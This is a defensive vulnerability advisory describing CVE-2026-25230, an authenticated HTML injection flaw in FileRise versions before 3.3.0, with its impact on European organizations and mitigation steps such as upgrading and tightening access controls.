CVE-2026-25230 is an HTML Injection vulnerability classified under CWE-79 (Improper Neutralization of Input During Web Page Generation) and CWE-116 (Improper Encoding or Escaping of Output). It affects FileRise, a self-hosted web file manager and WebDAV server, in versions prior to 3.3.0. The vulnerability allows an authenticated user to inject arbitrary HTML elements into the Document Object Model (DOM) of the web interface. This can include form elements that interact with backend endpoints or link elements that redirect users upon clicking. Because the vulnerability requires authentication and user interaction, exploitation is limited to users who already have some level of access to the system. The injected content can be used to manipulate the user interface, potentially leading to actions like phishing within the application, session manipulation, or triggering unintended requests. The CVSS v3.1 score is 4.6 (medium severity), reflecting the limited scope and impact. The vulnerability was publicly disclosed on February 9, 2026, and has been addressed in FileRise version 3.3.0. No known exploits are reported in the wild at this time.

For European organizations, this vulnerability poses a moderate risk primarily to the integrity and availability of the FileRise web interface. Since exploitation requires authenticated access, the threat is mostly internal or from compromised accounts. Attackers could manipulate the web interface to trick users into performing unintended actions, potentially leading to data manipulation or denial of service within the application. While confidentiality is not directly impacted, the altered interface could facilitate social engineering attacks or indirect data exposure. Organizations relying on FileRise for file management or WebDAV services could face operational disruptions or reduced trust in the system's integrity. The impact is heightened in environments with multiple users sharing access or where user privileges are not tightly controlled.

European organizations should immediately upgrade all FileRise instances to version 3.3.0 or later to remediate this vulnerability. Until upgrades are completed, implement strict access controls to limit authenticated user privileges, ensuring only trusted users have write or administrative access. Employ web application firewalls (WAFs) with custom rules to detect and block suspicious HTML injection attempts. Conduct regular audits of user accounts and session activities to identify unusual behavior. Additionally, educate users about the risks of interacting with unexpected or suspicious interface elements, emphasizing caution with links and forms within the application. Consider network segmentation to isolate FileRise servers from broader enterprise networks, reducing the risk of lateral movement if an account is compromised.